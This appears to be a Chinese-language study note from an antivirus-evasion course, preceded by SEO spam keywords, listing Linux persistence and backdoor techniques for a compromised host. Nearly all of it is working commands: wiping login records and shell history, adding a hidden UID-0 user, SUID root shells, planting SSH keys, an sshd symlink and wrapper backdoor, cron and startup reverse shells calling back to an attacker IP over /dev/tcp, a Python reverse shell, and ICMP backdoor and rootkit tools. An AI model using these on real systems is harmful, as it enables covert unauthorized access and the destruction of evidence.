网站运营工作,南通关键词优化软件,网站建设死人接单,用python做的电商网站1.隐藏踪迹
创建隐藏文件(ls不可见#xff0c;ls -la可见)#xff1a;
vim .shell.php修改时间戳(文件时间)#xff1a;
touch -r 老文件 shell.elf文件锁定(赋予特殊权限#xff0c;不允许更改)#xff1a;
chattr i shell.elf无w、who、last等记录ssh#xff1a;
…1.隐藏踪迹
创建隐藏文件(ls不可见ls -la可见)
vim .shell.php
修改时间戳(文件时间)
touch -r 老文件 shell.elf文件锁定(赋予特殊权限不允许更改)
chattr i shell.elf无w、who、last等记录ssh
ssh -T rootIP清除last记录(登录信息)
echo /var/log/wtmp端口复用
将来自IP访问80端口的流量转发到22端口
iptables -t nat -A PREROUTING -p tcp -s IP --dport 80 -j REDIRECT --to-port 22ssh连接80端口
ssh -p 80 rootIP历史命令记录隐藏
set o history停止记录
history查看记录
history -d 序号删除记录
2.添加root权限用户
直接添加
useradd -p openssl passwd -1 -salt salt 123456 hacker -o -u 0 -g root -G root -s /bin/bash -d /home/hacker修改/etc/passwd
生成密码-放入passwd最后一行
[rootlocalhost ~]# perl -le print crypt(123456,addedsalt)
adrla7IBSfTZQ
[rootlocalhost ~]# echo hacker:adrla7IBSfTZQ:0:0:root:/root:/bin/bash /etc/passwd3.suid shell
让普通用户能用root
cp /bin/bash /tmp/shell
chmod us /tmp/shell此时普通用户可以用root
[lylocalhost root]$ /tmp/shell -p
shell-4.2# whoami
root4.ssh公私钥
生成公私钥回车就行(id_rsa是私钥、id_rsa.pub是公钥)
ssh-keygen -t rsa查看公钥
cat /root/.ssh/id_rsa.pub在对方电脑创建目录并放入公钥(注意粘贴开头可能少个s)重启服务
mkdir /root/.ssh
vim /root/.ssh/authorized_keys
systemctl restart sshd.service无需密码连接
ssh rootIP5.ssh软连接
需要PAM认证下面UsePAM为yes
vim /etc/ssh/sshd_config防火墙开放端口-重启-查看是否开放
firewall-cmd --add-port7777/tcp --permanent
firewall-cmd --reload
firewall-cmd --query-port7777/tcp建立软连接
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport7777免密登录
ssh rootIP -p 77776.ssh wrapper
先开启ssh将原本的sshd移位
systemctl start sshd.service
cd /usr/sbin/
mv sshd /重写一个sshd赋予权限
echo #!/usr/bin/perl sshd
echo exec /bin/sh if(getpeername(STDIN) ~ /^..4A/); sshd
echo exec{/usr/bin/sshd} /usr/sbin/sshd,ARGV, sshd
chmod ux sshd免密登录
socat STDIO TCP4:IP:22,sourceport133777.计划任务
写一个反弹shell脚本并赋权
echo #!/bin/bash /shell.sh
echo bash -i /dev/tcp/IP/6666 01 /shell.sh
chmod sx /etc/shell.sh添加一分钟一次的root权限计划任务
echo */1 * * * * root /shell.sh /etc/crontab
systemctl restart crond.service8.启动项
添加后门路径并赋权
echo /shell.elf /etc/rc.d/rc.local
chmod x /etc/rc.d/rc.local9.vim python后门
vim --version看支不支持python3
反弹shell脚本一个socket服务端vim shell.py写入
import socket, subprocess, os;
s socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect((IP, 6666));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p subprocess.call([/bin/sh, -i]);NC监听并在对方电脑执行(可能需要等一下)
vim -E -c py3file shell.py10.icmp后门工具
https://github.com/andreafabrizi/prism
vim prism.c填反弹IP、端口、时间、密码、进程名
# define REVERSE_HOST 192.168.1.225
# define REVERSE_PORT 19832
# define RESPAWN_DELAY 10
# define ICMP_KEY 123456
# define PROCESS_NAME mysql后台编译生成prism在对方电脑并运行
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c
./prismNC监听并在自己电脑执行
python2 ./sendPacket.py 对方IP 密码 自己IP 端口11.Reptile工具
https://github.com/f0rb1dd3n/Reptile
本文为免杀三期学员笔记https://www.cnblogs.com/Night-Tac/articles/16941099.html